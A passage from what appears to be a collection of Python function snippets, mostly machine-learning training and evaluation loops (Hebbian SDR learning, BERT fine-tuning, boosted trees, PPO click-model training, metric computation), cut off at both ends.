True):\n # Update permanence values for learning -> Hebbian learning\n z = sdr.transpose() * syn_array\n polar_input = np.copy(input_set[iter, :])\n polar_input[polar_input == 1] = perm_inc\n polar_input[polar_input == 0] = perm_dec\n delta_perm = polar_input * z\n perm_array = perm_array + delta_perm\n perm_array[perm_array > 1] = 1\n perm_array[perm_array < 0] = 0\n\n # Add SDR to array and calculate metrics\n # Metrics include: sparseness\n if train_en == False:\n sdr_test_array[iter, :] = sdr\n sparse_test_array[iter, 0] = sparseness(n_cols, sdr)\n else:\n sdr_train_array[iter, :] = sdr\n sparse_train_array[iter, 0] = sparseness(n_cols, sdr)\n\n # You are set!!!\n\n if(verbose):\n pixel_sdr = int(n_cols**(0.5))\n # Plot the image\n sdr_image = np.reshape(sdr, (pixel_sdr, pixel_sdr))\n\n # Plot the image\n image = np.reshape(train_data[iter, :], (pixel_size, pixel_size))\n plt.figure(1)\n plt.subplot(211)\n plt.imshow(image, cmap='gray_r')\n plt.title('Train')\n\n # Plot the sdr\n plt.subplot(212)\n plt.imshow(sdr_image, cmap='gray_r')\n plt.title('SDR')\n plt.tight_layout()\n plt.show()\n if(iter % 10 == 0):\n print(iter)\n\n train_en = False\n return sdr_train_array, sdr_test_array, sparse_train_array, sparse_test_array", "def calculate_training_loss(self):\n self.network.train()\n self.training_average_loss = self.calculate_average_loss(self.training_dataloader)", "def trainNet():", "def train(self, X, y, batch_size=5, num_epochs=10, alpha=0.1, gamma=0.9, learning=\"Delta\"):\n rem = int(np.ceil(len(X[0])/batch_size))\n for epoch in range(num_epochs):\n art = 0;\n for sample in range(rem):\n end = art + batch_size\n\n # Get a sample (column from X and Y) where the size of the sample is given by the batch size\n sampleX = X[:, art : end]\n sampleY = y[:, art : end]\n #print (sampleX)\n\n # Get the prediction\n results = self.predict(sampleX)\n art += batch_size\n\n if learning == \"Delta\" or learning == \"delta\":\n # Calculate e\n e = np.subtract(sampleY, results)\n\n # Calculate e dot p, where p is the input matrix\n ep = np.dot(e, np.transpose(sampleX))\n\n # Multiply this new matrix by the scalar alpha\n aep = np.multiply(alpha, ep)\n\n # Calculate the new weights along with the bias\n self.weights = np.add(self.weights, aep)\n \n elif learning == \"Filtered\" or learning == \"filtered\":\n\n # Calculate e dot p, where p is the input matrix\n ep = np.dot(sampleY, np.transpose(sampleX))\n\n # Multiply this new matrix by the scalar alpha\n aep = np.multiply(alpha, ep)\n\n # Multiply the old weights by some scalar gamma\n gw = np.multiply(1 - gamma, self.weights)\n\n self.weights = np.add(gw, aep)\n\n elif learning == \"Unsupervised_hebb\" or learning == \"unsupervised_hebb\":\n # Add a row of one's to the top of the input matrix\n #newX = np.vstack((np.array([1 for column in range(sampleX.shape[1])]), sampleX))\n\n # Calculate e dot p, where p is the input matrix\n ep = np.dot(results, np.transpose(sampleX))\n\n # Multiply this new matrix by the scalar alpha\n aep = np.multiply(alpha, ep)\n\n # Calculate the new weights along with the bias\n self.weights = np.add(self.weights, aep)", "def fit(self):\n for i in range(self.current_epoch, self.max_epoch):\n self.current_epoch += 1\n # train\n train_dataloader = self.data_module.get_train_dataloader(\n batch_size=self.train_batch_size, \n shuffle=self.train_dataloader_shuffle, \n num_workers=self.dataloader_num_workers,\n pin_memory=True\n )\n neptune.log_metric(\"learning_rate_vs_epoch\", self.optimizer.param_groups[0]['lr'])\n self.train_one_epoch(train_dataloader)\n\n # validate \n if self.validate_after == 'epoch' and self.train_on_all_data == False and self.run_lr_range_test == False:\n validation_dataloader = self.data_module.get_valid_dataloader(\n batch_size=self.valid_batch_size, \n shuffle=self.train_dataloader_shuffle, \n num_workers=self.dataloader_num_workers, \n pin_memory=True\n )\n self.validate_one_epoch(validation_dataloader)\n\n if self.scheduler:\n if self.step_scheduler_after == 'epoch': \n if self.step_scheduler_metric == 'val_auc':\n self.scheduler.step(self.metrics['valid'][-1]['auc_score'])\n else:\n self.scheduler.step()\n\n if self.run_lr_range_test:\n neptune.log_metric('validation_epoch_end_AUC_vs_LR', \n self.scheduler.get_last_lr()[0], y=self.metrics['valid'][-1]['auc_score'])\n\n # checkpoint model for resuming model\n if (self.current_epoch % self.checkpoint_epochs) == 0:\n self.save_checkpoint()\n\n # sleep the training process\n if self.current_epoch % self.sleep_in_epochs == 0:\n print(f\"SLEEPING FOR {self.sleep_time} at epoch={self.current_epoch}\")\n for i in range(int(self.sleep_time/30)):\n time.sleep(i)\n neptune.log_metric(\"sleeping_status\", y=1)\n\n stop_training = self.stopping_criteria()\n if stop_training:\n if self.fp16:\n self.scaler.step(self.optimizer)\n self.scaler.update()\n self.optimizer.zero_grad()\n else:\n self.optimizer.step()\n self.optimizer.zero_grad()\n # backward all the accumulate gradients\n print(f\"stopped training at {self.current_epoch} epoch\")\n break", "def performance(stats):\n\n def fbeta_score(precision, recall, beta=1.0):\n beta_square = beta * beta\n if (precision != 0.0) and (recall != 0.0):\n res = ((1 + beta_square) * precision * recall / (beta_square * precision + recall))\n else:\n res = 0.0\n return res\n\n def prf1(tp_, fp_, fn_, tn_):\n # 单类的\n tp_ = np.sum(tp_, axis=0) #batch*=》\n fp_ = np.sum(fp_, axis=0)\n fn_ = np.sum(fn_, axis=0)\n tn_ = np.sum(tn_, axis=0)\n # 总体的\n atp = np.sum(tp_)\n afp = np.sum(fp_)\n afn = np.sum(fn_)\n atn = np.sum(tn_)\n\n micro_p = (1.0 * atp) / (atp + afp) if (atp + afp != 0) else 0.0\n micro_r = (1.0 * atp) / (atp + afn) if (atp + afn != 0) else 0.0\n micro_f = fbeta_score(micro_p, micro_r)\n\n pp = [0]\n rr = [0]\n ff = [0]\n macro_p = np.mean(pp)\n macro_r = np.mean(rr)\n macro_f = np.mean(ff)\n\n acc = (atp + atn) / (atp + atn + afp + afn) if (atp + atn + afp + afn) else 0.0\n acc_NA = atn / (atn + afp) if (atn + afp) else 0.0\n acc_not_NA = atp / (atp + afn) if (atp + afn) else 0.0\n return {'acc': acc, 'NA_acc': acc_NA, 'not_NA_acc': acc_not_NA,\n 'micro_p': micro_p, 'micro_r': micro_r, 'micro_f': micro_f,\n 'macro_p': macro_p, 'macro_r': macro_r, 'macro_f': macro_f,\n 'tp': atp, 'true': atp + afn, 'pred': atp + afp, 'total': (atp + atn + afp + afn)}\n\n fin_loss = sum(stats['loss']) / len(stats['loss'])\n scores = prf1(stats['tp'], stats['fp'], stats['fn'], stats['tn'])\n return fin_loss, scores", "def finetune_learningrate_createData():\n acc,auc = [],[]\n for i in tqdm([j*0.005 for j in range(1,31)],desc='Progress(max_depth)',ncols=70,smoothing=0.5):\n X_train, X_test, y_train, y_test, X, y_binary = initializing()\n XGBCla = get_XGBmodel(lr=i)\n XGBCla = XGBCla.fit(X_train, y_train)\n acc.append(accuracy_score(XGBCla.predict(X_test),y_test))\n auc.append(roc_auc_score(XGBCla.predict(X_test),y_test))\n np.save(\"npy-data/result_learningrate_tuning_acc_auc_crossval_train\",acc+auc)", "def test_bayes_updates_good_data(self):\r\n # result for first -> fourth calculated by hand\r\n for obs, exp in zip(bayes_updates(self.test), self.result):\r\n self.assertFloatEqualAbs(obs, exp, 1e-11)", "def train_and_evaluate(OUTPUT_DIR,do_train = True,do_eval=True):\n\n\t\n\tBATCH_SIZE = 32\n\tLEARNING_RATE = 2e-5\n\tNUM_TRAIN_EPOCHS = 5.0\n\n\t#in this steps lr will be low and training will be slow\n\tWARMUP_PROPORTION = 0.1\n\n\n\n\tif os.path.exists(OUTPUT_DIR) and os.listdir(OUTPUT_DIR) and do_train:\n\t\traise ValueError(\"Output directory ({}) already exists and is not empty.\".format(OUTPUT_DIR))\n\tif not os.path.exists(OUTPUT_DIR):\n\t\tos.makedirs(OUTPUT_DIR)\n\t\t\n\t#create train and test data\n\n\ttrain_sents,train_labels,test_sents,test_labels = create_train_test(\"ADE/DRUG-AE.rel\",\"ADE/negative_data_AE.rel\")\n\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ttokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\", do_lower_case=True)\n\n\tif do_train:\n\n\t\ttrain_examples = [InputExample(guid=None,text_a=sentence,text_b=None,label=label) for sentence,label in zip(train_sents, train_labels)]\n\t\tnum_train_examples = len(train_examples)\n\n\t\tnum_train_steps = int(math.ceil(num_train_examples / BATCH_SIZE * NUM_TRAIN_EPOCHS))\n\t\tnum_warmup_steps = int(num_train_steps * WARMUP_PROPORTION)\n\n\t\tmodel = BertForSequenceClassification.from_pretrained(\"bert-base-uncased\",num_labels = num_labels)\n\t\tmodel.to(device)\n\n\t\tparam_optimizer = list(model.named_parameters())\n\t\tno_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n\t\toptimizer_grouped_parameters = [\n\t\t\t{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n\t\t\t{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n\t\t\t]\n\n\t\toptimizer = BertAdam(optimizer_grouped_parameters,lr=LEARNING_RATE,warmup=WARMUP_PROPORTION,t_total=num_train_steps)\n\n\t\tglobal_step = 0\n\t\tnb_tr_steps = 0\n\t\ttr_loss = 0\n\n\t\ttrain_features = convert_examples_to_features(\n\t\t\ttrain_examples, label_list, MAX_SEQ_LENGTH, tokenizer)\n\n\n\t\tlogger.info(\"***** Running training *****\")\n\t\tlogger.info(\" Num examples = %d\", num_train_examples)\n\t\tlogger.info(\" Batch size = %d\", BATCH_SIZE)\n\t\tlogger.info(\" Num steps = %d\", num_train_steps)\n\n\n\t\tall_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)\n\t\tall_label_ids = torch.tensor([f.label_id for f in train_features], dtype=torch.long)\n\n\t\ttrain_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)\n\t\ttrain_sampler = RandomSampler(train_data)\n\n\t\ttrain_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=BATCH_SIZE)\n\n\t\tmodel.train()\n\t\t# for name, param in model.named_parameters():\n\t\t# if param.requires_grad:\n\t\t# print(name)\n\t\t# return\n\t\tfor _ in trange(int(NUM_TRAIN_EPOCHS), desc=\"Epoch\"):\n\t\t\ttr_loss = 0\n\t\t\tnb_tr_examples, nb_tr_steps = 0, 0\n\t\t\tfor step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n\t\t\t\tbatch = tuple(t.to(device) for t in batch)\n\t\t\t\tinput_ids, input_mask, segment_ids, label_id = batch\n\t\t\t\tloss = model(input_ids, segment_ids, input_mask, label_id)\n\t\t\t\tloss.backward()\n\n\t\t\t\ttr_loss += loss.item()\n\t\t\t\tnb_tr_examples += input_ids.size(0)\n\t\t\t\tnb_tr_steps += 1\n\t\t\t\toptimizer.step()\n\t\t\t\toptimizer.zero_grad()\n\t\t\t\tglobal_step += 1\n\t\t\tprint(tr_loss)\n\n\t\t# Save a trained model and the associated configuration\n\t\tmodel_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n\t\toutput_model_file = os.path.join(OUTPUT_DIR, WEIGHTS_NAME)\n\t\ttorch.save(model_to_save.state_dict(), output_model_file)\n\t\toutput_config_file = os.path.join(OUTPUT_DIR, CONFIG_NAME)\n\t\twith open(output_config_file, 'w') as f:\n\t\t\tf.write(model_to_save.config.to_json_string())\n\t\tlabel_map = {i : label for i, label in enumerate(label_list,1)} \n\t\tmodel_config = {\"bert_model\":\"bert-base-uncased\",\"do_lower\":True,\"max_seq_length\":MAX_SEQ_LENGTH,\"num_labels\":num_labels,\"label_map\":label_map}\n\t\tjson.dump(model_config,open(os.path.join(OUTPUT_DIR,\"model_config.json\"),\"w\"))\n\n\telse:\n\t\toutput_config_file = os.path.join(OUTPUT_DIR, CONFIG_NAME)\n\t\toutput_model_file = os.path.join(OUTPUT_DIR, WEIGHTS_NAME)\n\t\tconfig = BertConfig(output_config_file)\n\t\tmodel = BertForSequenceClassification(config, num_labels=num_labels)\n\t\tmodel.load_state_dict(torch.load(output_model_file))\n\n\tmodel.to(device)\n\n\tif do_eval:\n\n\t\tEVAL_BATCH_SIZE = 32\n\n\t\teval_examples = [InputExample(guid=None,text_a=sentence,text_b=None,label=label) for sentence,label in zip(test_sents, test_labels)]\n\t\tnum_eval_examples = len(eval_examples)\n\n\t\teval_features = convert_examples_to_features(\n\t\t\teval_examples, label_list, MAX_SEQ_LENGTH, tokenizer)\n\n\t\tlogger.info(\"***** Running evaluation *****\")\n\t\tlogger.info(\" Num examples = %d\", num_eval_examples)\n\t\tlogger.info(\" Batch size = %d\", EVAL_BATCH_SIZE)\n\t\tall_input_ids = torch.tensor([f.input_ids for f in eval_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in eval_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in eval_features], dtype=torch.long)\n\t\tall_label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long)\n\t\teval_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids) \n\t\t# # Run prediction for full data\n\t\teval_sampler = SequentialSampler(eval_data)\n\t\teval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=EVAL_BATCH_SIZE)\n\t\tmodel.eval()\n\n\t\teval_loss, eval_accuracy = 0, 0\n\t\tnb_eval_steps, nb_eval_examples = 0, 0\n\t\ty_true = []\n\t\ty_pred = []\n\t\tlabel_map = {i : label for i, label in enumerate(label_list,1)}\n\t\tfor input_ids, input_mask, segment_ids, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):\n\t\t\tinput_ids = input_ids.to(device)\n\t\t\tinput_mask = input_mask.to(device)\n\t\t\tsegment_ids = segment_ids.to(device)\n\t\t\tlabel_ids = label_ids.to(device)\n\n\t\t\twith torch.no_grad():\n\t\t\t\tlogits = model(input_ids, segment_ids, input_mask)\n\t\t\t\t\n\t\t\tlogits = torch.argmax(F.log_softmax(logits,dim=1),dim=1)\n\t\t\tlogits = logits.detach().cpu().numpy()\n\t\t\tlabel_ids = label_ids.to('cpu').numpy()\n\t\t\ty_pred.extend(logits)\n\t\t\ty_true.extend(label_ids)\n\t\tprint(len(y_pred))\n\t\tprint(len(y_true))\n\t\treport = classification_report(y_true, y_pred)\n\t\toutput_eval_file = os.path.join(OUTPUT_DIR, \"eval_results.txt\")\n\t\twith open(output_eval_file, \"w\") as writer:\n\t\t\tlogger.info(\"***** Eval results *****\")\n\t\t\tlogger.info(\"\\n%s\", report)\n\t\t\twriter.write(report)", "def train(self, n):\n t = self.t\n\n parallel_sentences = list(zip(self.target,self.source))\n\n for i in range(n):\n\n count = defaultdict(lambda:defaultdict(int))\n s_total = dict()\n total = defaultdict(int)\n\n for E,F in parallel_sentences:\n # compute normalization\n for e in E:\n t_e = t[e]\n s_total[e] = 0\n for f in F:\n s_total[e] += t_e[f]\n\n # collect counts\n for e in E:\n count_e = count[e]\n t_e = t[e]\n s_total_e = s_total[e]\n for f in F:\n tmp = t_e[f] / s_total_e\n count_e[f] += tmp\n total[f] += tmp\n\n # estimate probabilities\n for e in self.t_words:\n t_e = t[e]\n count_e = count[e]\n #for f in self.s_words:\n for f in count_e:\n #if f not in count[e]: continue\n t_e[f] = count_e[f] / total[f]", "def train(self, data_source, batch_size=4096):\n self.mean, self.std_dev = stats_batchwise(data_source, batch_size)", "def SGD(self, X_train, Y_train, X_validation, Y_validation, epochs, mini_batch_size, learning_rate, decay):\n \n training_data = zip(X_train, Y_train)\n validation_data = zip(X_validation, Y_validation)\n\n \n \"\"\"Take the training data and make a list out of it\"\"\"\n training_data = list(training_data)\n \n \"\"\"Check if there is data in the test_data\"\"\"\n if validation_data:\n validation_data = list(validation_data)\n n_validation_data = len(validation_data)\n \n \"\"\"\n Mini-batches: Each mini-batch contains mini_batch_size elements from the training set.\n \n Splits the training data into mini-bachtes, and for each mini-batches we train the network. \n \n \"\"\" \n\n# Updated for the testing\n# ========================\n mini_batches = []\n high_score = [0,0]\n for j in range(epochs):\n random.shuffle(training_data)\n for k in range(0, len(training_data), mini_batch_size):\n mini_batches.append(training_data[k:k+mini_batch_size])\n for mini_batch in mini_batches:\n self.update_mini_batch(mini_batch, learning_rate)\n if validation_data:\n new_score = self.evaluate(X_validation, Y_validation)\n if high_score[0] < new_score:\n high_score[0] = new_score\n high_score[1] = j + 1\n learning_rate = learning_rate * (1-decay)\n \n return high_score[0], high_score[1]\n# ========================\n\n\n \"\"\"\n Update the network's weights and biases by applying\n gradient descent using backpropagation to a single mini batch.\n The ``mini_batch`` is a list of tuples ``(x, y)``, and ``eta``\n is the learning rate.\"\"\"", "def build(self):\n # weights to apply to training samples, updated on each\n # iteration of the boosting algo, normalised to 1\n sigWeights = np.ones(self.nSig, dtype=float)\n bkgWeights = np.ones(self.nBkg, dtype=float)\n reweight = 1.0/(np.sum(sigWeights)+np.sum(bkgWeights))\n sigWeights *= reweight\n bkgWeights *= reweight \n\n # Weight of each tree, strong classifers have higher weight\n self.treeWeights = np.zeros(self.ntrees, dtype=float)\n\n for i in xrange(self.ntrees):\n\n # build new tree\n newTree = Tree()\n newTree.load(self.sigData,self.bkgData,weights=(sigWeights,bkgWeights))\n newTree.build()\n self.dTrees.append(newTree) \n\n # evaluate trees\n # keep track of each event\n err = 0.0\n sigWrong = np.zeros(self.nSig)\n bkgWrong = np.zeros(self.nBkg)\n\n for j in range(self.nSig):\n if newTree.classify(np.array((self.sigData[j,])))<0:\n sigWrong[i]=1\n err+=sigWeights[j]\n\n for j in range(self.nBkg):\n if newTree.classify(np.array((self.bkgData[j,])))>0:\n bkgWrong[i]=1\n err+=bkgWeights[j]\n\n alpha = self.beta*math.log((1.0-err)/err)\n print err,alpha\n corFactor = math.exp(-alpha)\n wrongFactor = math.exp(alpha)\n\n if (err<1e-20 or err >= 0.5):\n print \"SOEMTHING WRONG!!\"\n\n self.treeWeights[i] = alpha\n\n # reweight training samples\n for j in range(self.nSig):\n if sigWrong[j]:\n sigWeights[j]*=wrongFactor\n else :\n sigWeights[j]*=corFactor\n\n for j in range(self.nBkg):\n if bkgWrong[j]:\n bkgWeights[j]*=wrongFactor\n else :\n bkgWeights[j]*=corFactor\n\n # normalise weights\n reweight = 1.0/(np.sum(sigWeights)+np.sum(bkgWeights))\n sigWeights *= reweight\n bkgWeights *= reweight", "def _train_epoch(self, train_batches, data, max_metric_value, metric_save, patience, step_pbar):\n evaluate = True\n exit_tag = False\n num_steps = self.args.num_steps\n check_point, batch_size = self.args.check_point, self.args.batch_size\n save_dir, save_prefix = self.args.save_dir, self.args.algo\n\n for bitx, batch in enumerate(train_batches):\n if evaluate and self.global_step % self.eval_freq == 0:\n if data.dev_set is not None:\n dev_batches = data.gen_mini_batches('dev', 31928, shuffle=False)\n dev_loss, dev_perplexity, dev_perplexity_at_rank = self.evaluate(dev_batches, data)\n #print('dev loss=%s' % dev_loss, 'dev ppl=%s' % dev_perplexity, 'dev ppl at rank=', dev_perplexity_at_rank)\n\n test_batches = data.gen_mini_batches('test', 41405, shuffle=False)\n test_loss, test_perplexity, test_perplexity_at_rank = self.evaluate(test_batches, data)\n #print('test loss=%s' % test_loss, 'dev ppl=%s' % test_perplexity, 'dev ppl at rank=' , test_perplexity_at_rank)\n\n self.writer.add_scalar(\"dev/loss\", dev_loss, self.global_step)\n self.writer.add_scalar(\"dev/perplexity\", dev_perplexity, self.global_step)\n self.writer.add_scalar(\"test/loss\", test_loss, self.global_step)\n self.writer.add_scalar(\"test/perplexity\", test_perplexity, self.global_step)\n\n for trunc_level in self.trunc_levels:\n ndcg_version1, ndcg_version2 = self.relevance_estimator.evaluate(self, data, self.relevance_queries, trunc_level)\n self.writer.add_scalar(\"NDCG_version1/{}\".format(trunc_level), ndcg_version1, self.global_step)\n self.writer.add_scalar(\"NDCG_version2/{}\".format(trunc_level), ndcg_version2, self.global_step)\n\n if dev_loss < metric_save:\n metric_save = dev_loss\n patience = 0\n else:\n patience += 1\n # Trick: do not decay d_lr help convergence\n if patience >= self.patience:\n #self.adjust_learning_rate(self.discrim_optimizer, self.args.lr_decay)\n self.adjust_learning_rate(self.policy_optimizer, self.args.lr_decay)\n self.g_lr *= self.args.lr_decay\n #self.d_lr *= self.args.lr_decay\n self.writer.add_scalar('train/g_lr', self.g_lr, self.global_step)\n #self.writer.add_scalar('train/d_lr', self.d_lr, self.global_step)\n metric_save = dev_loss\n patience = 0\n self.patience += 1\n else:\n self.logger.warning('No dev set is loaded for evaluation in the dataset!')\n\n self.global_step += 1\n step_pbar.update(1)\n QIDS = Variable(torch.from_numpy(np.array(batch['qids'], dtype=np.int64)))\n UIDS = Variable(torch.from_numpy(np.array(batch['uids'], dtype=np.int64)))\n VIDS = Variable(torch.from_numpy(np.array(batch['vids'], dtype=np.int64)))\n PRE_CLICKS = Variable(torch.from_numpy(np.array(batch['clicks'], dtype=np.int64)[:, :-1]))\n CLICKS = Variable(torch.from_numpy(np.array(batch['clicks'], dtype=np.int64)[:, 1:]))\n\n # generate trajectories\n for __ in range(self.args.d_step):\n actor_rnn_state = Variable(torch.zeros(1, QIDS.shape[0], self.gru_hidden_size))\n critic_rnn_state = Variable(torch.zeros(1, QIDS.shape[0], self.gru_hidden_size))\n CLICK_ = torch.zeros(QIDS.shape[0], 1, dtype=CLICKS.dtype)\n logits = torch.zeros(QIDS.shape[0], 0, 2)\n values = torch.zeros(QIDS.shape[0], 0)\n CLICKS_ = Variable(torch.zeros((QIDS.shape[0], 0), dtype=CLICKS.dtype))\n if self.use_cuda:\n QIDS, UIDS, VIDS, PRE_CLICKS, CLICKS = QIDS.cuda(), UIDS.cuda(), VIDS.cuda(), PRE_CLICKS.cuda(), CLICKS.cuda()\n actor_rnn_state, critic_rnn_state, CLICK_ = actor_rnn_state.cuda(), critic_rnn_state.cuda(), CLICK_.cuda()\n logits, values, CLICKS_ = logits.cuda(), values.cuda(), CLICKS_.cuda()\n self.policy.eval()\n for i in range(self.max_d_num + 1):\n logit, value, actor_rnn_state, critic_rnn_state = self.policy(QIDS[:, i:i+1], \n UIDS[:, i:i+1], \n VIDS[:, i:i+1], \n CLICK_, \n actor_rnn_state, \n critic_rnn_state)\n if i > 0:\n CLICK_ = torch.distributions.Categorical(logit).sample()\n logits = torch.cat([logits, logit], dim=1)\n values = torch.cat([values, value], dim=1)\n CLICKS_ = torch.cat([CLICKS_, CLICK_], dim=1)\n\n if self.use_cuda:\n CLICKS_ = torch.cat((torch.zeros((CLICKS_.shape[0], 1), dtype=CLICKS_.dtype, device=torch.device('cuda')), CLICKS_), dim=1)\n else:\n CLICKS_ = torch.cat((torch.zeros((CLICKS_.shape[0], 1), dtype=CLICKS_.dtype), CLICKS_), dim=1)\n\n '''update discriminator'''\n for _ in range(self.args.k):\n self.discrim.train()\n self.discrim_optimizer.zero_grad()\n g_o, _ = self.discrim(QIDS, UIDS, VIDS, CLICKS_)\n g_o_target = torch.ones((QIDS.shape[0], g_o.shape[1]))\n e_o, _ = self.discrim(QIDS, UIDS, VIDS, CLICKS)\n e_o_target = torch.zeros((QIDS.shape[0], e_o.shape[1]))\n if self.use_cuda:\n g_o_target, e_o_target = g_o_target.cuda(), e_o_target.cuda()\n \n discrim_loss = self.discrim_criterion(g_o, g_o_target) + self.discrim_criterion(e_o, e_o_target)\n discrim_loss.backward()\n self.discrim_optimizer.step()\n self.writer.add_scalar('train/d_loss', discrim_loss.data, self.global_step)\n\n '''estimate advantage'''\n with torch.no_grad():\n self.discrim.eval()\n rewards = -torch.log(self.discrim(QIDS, UIDS, VIDS, CLICKS_)[0])\n # print(rewards.shape, values.shape)\n #print(tensor_type)\n #exit(0)\n deltas = torch.zeros(rewards.shape)\n advantages = torch.zeros(rewards.shape)\n prev_value = torch.zeros(rewards.shape[0])\n prev_advantage = torch.zeros(rewards.shape[0])\n if self.use_cuda:\n deltas, advantages = deltas.cuda(), advantages.cuda()\n prev_value, prev_advantage = prev_value.cuda(), prev_advantage.cuda()\n '''print(deltas)\n print(advantages)\n print(prev_value)\n print(prev_advantage)\n exit(0)'''\n\n for i in reversed(range(rewards.size(1))):\n deltas[:, i] = rewards[:, i] + self.gamma * prev_value - values[:, i]\n advantages[:, i] = deltas[:, i] + self.gamma * self.tau * prev_advantage\n prev_value = values[:, i]\n prev_advantage = advantages[:, i]\n\n returns = values + advantages\n advantages = (advantages - advantages.mean()) / (advantages.std() + MINF)\n # advantages = (returns - returns.mean())/returns.std()\n\n fixed_log_probs = torch.distributions.Categorical(logits).log_prob(CLICKS_[:, 1:])\n\n '''PPO update'''\n self.policy.train()\n optim_batchsize = 512\n optim_iter_num = int(math.ceil(QIDS.shape[0] / optim_batchsize))\n if self.use_cuda:\n CLICKS_ = torch.cat((torch.zeros((CLICKS_.shape[0], 1), dtype=CLICKS_.dtype, device=torch.device('cuda')), CLICKS_), dim=1)\n else:\n CLICKS_ = torch.cat((torch.zeros((CLICKS_.shape[0], 1), dtype=CLICKS_.dtype), CLICKS_), dim=1)\n for _ in range(self.args.g_step):\n perm = np.arange(QIDS.shape[0])\n np.random.shuffle(perm)\n\n QIDS, UIDS, VIDS, PRE_CLICKS, CLICKS, CLICKS_, advantages, returns, fixed_log_probs = \\\n QIDS[perm].clone(), UIDS[perm].clone(), VIDS[perm].clone(), PRE_CLICKS[perm].clone(), \\\n CLICKS[perm].clone(), CLICKS_[perm].clone(), advantages[perm].clone(), returns[perm].clone(), fixed_log_probs[perm].clone()\n\n #print(QIDS)\n #exit(0)\n\n for i in range(optim_iter_num):\n ind = slice(i * optim_batchsize, min((i + 1) * optim_batchsize, QIDS.shape[0]))\n qids_b, uids_b, vids_b, pclicks_b, clicks_b, clicks__b, advantage_b, returns_b, fixed_log_probs_b = \\\n QIDS[ind], UIDS[ind], VIDS[ind], CLICKS_[ind, :-1], CLICKS[ind], CLICKS_[ind, 2:], \\\n advantages[ind], returns[ind], fixed_log_probs[ind]\n\n logits, values_pred, _, _ = self.policy(qids_b, uids_b, vids_b, pclicks_b)\n dist = torch.distributions.Categorical(logits)\n\n\n '''update critic'''\n value_loss = (values_pred - returns_b).pow(2).mean()\n '''optimizer policy'''\n log_probs_b = dist.log_prob(clicks__b)\n ratio = torch.exp(log_probs_b - fixed_log_probs_b)\n surr1 = ratio * advantage_b\n surr2 = torch.clamp(ratio, 1.0 - self.clip_epsilon, 1.0 + self.clip_epsilon) * advantage_b\n policy_surr = -torch.min(surr1, surr2).mean()\n pe = dist.entropy().mean()\n loss = value_loss + self.alpha * policy_surr - self.beta * pe\n\n self.policy_optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.policy.parameters(), 40)\n self.policy_optimizer.step()\n g_loss, _ = self.compute_loss(logits, clicks_b)\n\n self.writer.add_scalar('train/g_loss', g_loss.data, self.global_step)\n self.writer.add_scalar('train/g_valueloss', value_loss.data, self.global_step)\n self.writer.add_scalar('train/g_policysurr', policy_surr.data, self.global_step)\n self.writer.add_scalar('train/g_entropy', pe.data, self.global_step)\n\n if check_point > 0 and self.global_step % check_point == 0:\n self.save_model(save_dir, save_prefix)\n if self.global_step >= num_steps:\n exit_tag = True\n\n return max_metric_value, exit_tag, metric_save, patience", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def test_generate_nb_testing(self):\n pass", "def run_epoch(data_iter, model, loss_compute, ctx):\r\n start = time.time()\r\n total_tokens = 0\r\n total_loss = 0\r\n tokens = 0\r\n for i, batch in enumerate(data_iter):\r\n out = model(batch.src, batch.trg, batch.src_mask, batch.trg_mask)\r\n loss = loss_compute(out, batch.trg_y, batch.ntokens)\r\n total_loss += loss\r\n total_tokens += batch.ntokens\r\n tokens += batch.ntokens\r\n if i % 50 == 1:\r\n elapsed = time.time() - start\r\n ctx.logger.info(\"Epoch Step: %d Loss: %f Tokens per Sec: %f\",\r\n i, loss / batch.ntokens, tokens / elapsed)\r\n start = time.time()\r\n tokens = 0\r\n return total_loss / total_tokens", "def evaluate(epoch_number):\r\n model.eval() # turn on the eval() switch to disable dropout\r\n total_loss = 0\r\n total_correct = 0\r\n total_spl = 0\r\n total_xrl = 0\r\n total_Xrl = 0\r\n total_Yrl = 0\r\n total_cl = 0\r\n total_ol = 0\r\n Ysave = []\r\n for batch, i in enumerate(range(0, len(data_val), args.batch_size)):\r\n data, targets, lenth = package(data_val[i:min(len(data_val), i+args.batch_size)], volatile=True)\r\n if args.cuda:\r\n data = data.cuda()\r\n targets = targets.cuda()\r\n hidden = model.init_hidden(data.size(1))\r\n x, y, x_re, X, Y, Y_fromX, X_fromY, pred, outp, outp_fromY = model.forward(data, hidden,lenth, \"eval\",epoch_number)\r\n Ysave.append( (Y.cpu(), pred.cpu(), targets.cpu()) )\r\n output_flat = pred.view(data.size(1), -1)\r\n loss, sparse_loss, x_re_loss, X_re_loss, Y_re_loss, class_loss, outp_loss= \\\r\n criterion(x, y, x_re, X, Y, 